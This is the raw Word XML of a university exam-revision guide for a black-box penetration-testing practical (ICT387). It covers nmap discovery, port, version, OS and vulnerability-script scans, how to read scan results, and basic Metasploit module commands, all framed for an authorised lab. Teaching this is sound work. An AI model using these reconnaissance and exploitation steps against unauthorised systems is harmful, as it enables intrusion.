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Caption"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>EXAM READINESS  /  OCTOBER 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>ICT387</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="18659B"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>BLACK-BOX PRACTICAL EXAM</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="566674"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Memorise • Practise • Troubleshoot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EAF2F8"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:start w:w="130" w:type="dxa"/>
              <w:bottom w:w="110" w:type="dxa"/>
              <w:end w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="18659B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>WHAT THE LECTURER ACTUALLY TESTS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Scanning (Labs 1 &amp; 3), Exploitation (Labs 4 &amp; 5) and Buffer Overflows (Lab 6). Topics 1–6. Closed book; only a pen and provided blank paper are permitted. Questions are sequential: answer before moving on. 100 minutes = 10 setup + 30 scanning + 30 exploitation + 30 buffer overflows.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Memorise these commands first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83"/>
        <w:gridCol w:w="4136"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4845"/>
            <w:shd w:fill="183F6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Command to recall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4845"/>
            <w:shd w:fill="183F6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48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ip -br a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="41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Show Kali network interfaces and IP addresses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="548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ip route</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="41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Find Kali subnet, gateway and interface.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="548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sudo nmap -sn &lt;SUBNET&gt;/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="41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Discover hosts without logging into the target.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="548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sudo nmap -sS &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="41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Basic TCP SYN scan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="548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sudo nmap -sS -p- &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="41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Scan every TCP port (1–65535).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="548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sudo nmap -sV -sC -p 21,22,80 &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="41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Inspect service versions and run default scripts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="548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sudo nmap -O &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="41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Attempt operating-system fingerprinting.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="548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msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="41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Launch Metasploit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="548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search &lt;SERVICE_OR_CVE&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="41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Find Metasploit modules matching scan evidence.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="548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use &lt;MODULE_PATH&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="41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Select an exploit or auxiliary module.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="548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show options  /  set RHOSTS &lt;IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="41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Inspect required settings; set lab target.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="548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show payloads  /  check  /  run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="41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Choose compatible payload, test if supported, execute.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E8F5F4"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:start w:w="130" w:type="dxa"/>
              <w:bottom w:w="110" w:type="dxa"/>
              <w:end w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="18659B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MENTAL WORKFLOW: D → S → V → E</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DISCOVER target IP → SCAN ports/services → VERIFY a plausible vulnerability → EXPLOIT only the authorised lab target. Record the IP, port, version and evidence before choosing a module.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SmallCaption"/>
      </w:pPr>
      <w:r>
        <w:t>Scope note: the official 2-page hints specify skills, not a complete command list. Commands and worked examples in this guide are extra revision material, checked against Nmap/Metasploit documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>1  BLACK-BOX START: FIND THE TARGET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Black-box means you begin without credentials or a known vulnerability. In a VM lab, first identify your Kali interface and the permitted subnet; do not assume the target has the same IP as it did last session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1 — Know where Kali is connected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EFF4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MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>ip -br a</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>ip route</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>ip neigh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>ip -br a: lists interfaces such as eth0, eth1 or enp0s3. Look for an IPv4 address and /prefix.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>ip route: shows connected network routes; e.g., 192.168.56.0/24 dev eth1 means scan that permitted host-only subnet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>ip neigh: may show neighbouring hosts previously contacted; not a complete host discovery tool.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2 — Find other live VMs without logging into them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EFF4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MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>sudo nmap -sn 192.168.56.0/24</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>sudo arp-scan --interface=eth1 --localnet   # if installed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>Replace 192.168.56.0/24 with YOUR lab subnet. Replace eth1 if your active host-only interface has a different name.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>The target may appear as a newly discovered IP. Compare the results with Kali’s own address and known gateway/host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:ind w:left="360" w:hanging="187"/>
      </w:pPr>
      <w:r>
        <w:t>Local ARP discovery can work even if ICMP echo is blocked. A missing reply does not prove the host is offline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 3 — Make a quick scan plan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EFF4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MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>nmap &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>sudo nmap -sS -p- -n &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="MonoBlock"/>
            </w:pPr>
            <w:r>
              <w:t>sudo nmap -sV -sC -p &lt;OPEN_PORTS&gt; &lt;TARGET_IP&gt;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FFF6E4"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:start w:w="130" w:type="dxa"/>
              <w:bottom w:w="110" w:type="dxa"/>
              <w:end w:w="130" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="18659B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>IF NMAP SAYS THE HOST SEEMS DOWN</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>On a known, authorised lab IP, try: nmap -Pn -p 22,80,443 &lt;TARGET_IP&gt;. -Pn SKIPS host discovery and assumes the host is up; it does not make the host respond or automatically find its IP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Never confuse these switches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9"/>
        <w:gridCol w:w="2886"/>
        <w:gridCol w:w="5194"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3230"/>
            <w:shd w:fill="183F6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Switch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3230"/>
            <w:shd w:fill="183F6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Memory trigger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3230"/>
            <w:shd w:fill="183F6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153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-sn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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scan no ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="51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Discover hosts only. No port scan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="153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-Pn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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ping = no</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="51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Treat target as up; skip initial host-discovery test.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="153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-p-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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port minus = all</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="51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Scan all 65,535 TCP ports in a TCP scan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="153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-n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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 DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="51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Skip DNS resolution.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="153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-sS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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SYN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="51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TCP half-open SYN scan (normally requires sudo).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="153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-sT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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TCP connect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="51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Full TCP connection, useful without raw socket privilege.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>2  NMAP: THE COMMANDS TO KNOW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Nmap primarily discovers hosts, ports and services. It can also run scripts that check for possible vulnerabilities, but an open port or a version string is not proof of a vulnerability.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51"/>
        <w:gridCol w:w="5868"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4845"/>
            <w:shd w:fill="183F6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What the question asks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4845"/>
            <w:shd w:fill="183F6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Command to type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Basic/common TCP ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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nmap &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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TCP SYN (half-open)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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sudo nmap -sS &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Full TCP connect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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nmap -sT &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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All TCP ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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sudo nmap -sS -p- &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Selected port / range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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nmap -p 80 &lt;TARGET_IP&gt;   |   nmap -p 1-1000 &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Multiple TCP ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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nmap -p 21,22,80,443 &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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UDP scan (usually slower)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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sudo nmap -sU -p 53,67,161 &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Service/version discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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nmap -sV -p 21,22,80 &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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OS discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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sudo nmap -O &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Default NSE scripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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nmap -sC -p 80,443 &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Version + default scripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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sudo nmap -sV -sC -p 21,22,80 &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Broad profiling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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sudo nmap -A &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Skip initial host discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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nmap -Pn -p 80,443 &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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NSE vuln category (lab only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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sudo nmap -sV --script vuln -p 80,443 &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Save scan results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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nmap -sV -oN scan.txt &lt;TARGET_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>What scan types actually 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6"/>
        <w:gridCol w:w="4810"/>
        <w:gridCol w:w="2693"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3230"/>
            <w:shd w:fill="183F6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Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3230"/>
            <w:shd w:fill="183F6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Core idea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3230"/>
            <w:shd w:fill="183F6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Remember</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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TCP SYN (-sS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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SYN → SYN/ACK (open) or RST (closed); does not complete normal TCP handshake.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Often called half-open.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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TCP connect (-sT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Uses OS connect() and completes TCP connection to open ports.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Useful without sudo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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UDP (-sU)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Sends UDP probes; ICMP responses/timeouts affect interpretation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Can show open|filtered; slower.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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Version (-sV)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Probes a service to identify product/version.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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 an exploit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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OS (-O)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Estimates OS from network fingerprint.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Best-effort, not guaranteed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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Aggressive (-A)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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Enables OS detection, version detection, default scripts and traceroute.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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More noisy/intrusive.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Interpret the result — these terms are exam favourites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7118"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4845"/>
            <w:shd w:fill="183F6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Nmap state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4845"/>
            <w:shd w:fill="183F6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open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="711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 service is accepting connections on that port.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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closed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="711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Host responded; there is no listening service on that port.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:t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filtered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="711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 filter/firewall or lack of reply prevents Nmap determining the port state.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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open|filtered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="711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Common with UDP: cannot confidently distinguish open from filtered.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>3  READ PORTS AND ENUMERATE SERVICES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Know these default ports by sight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2"/>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="5002"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3230"/>
            <w:shd w:fill="183F6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Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3230"/>
            <w:shd w:fill="183F6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Typical service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3230"/>
            <w:shd w:fill="183F6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What to investigate in an authorised lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
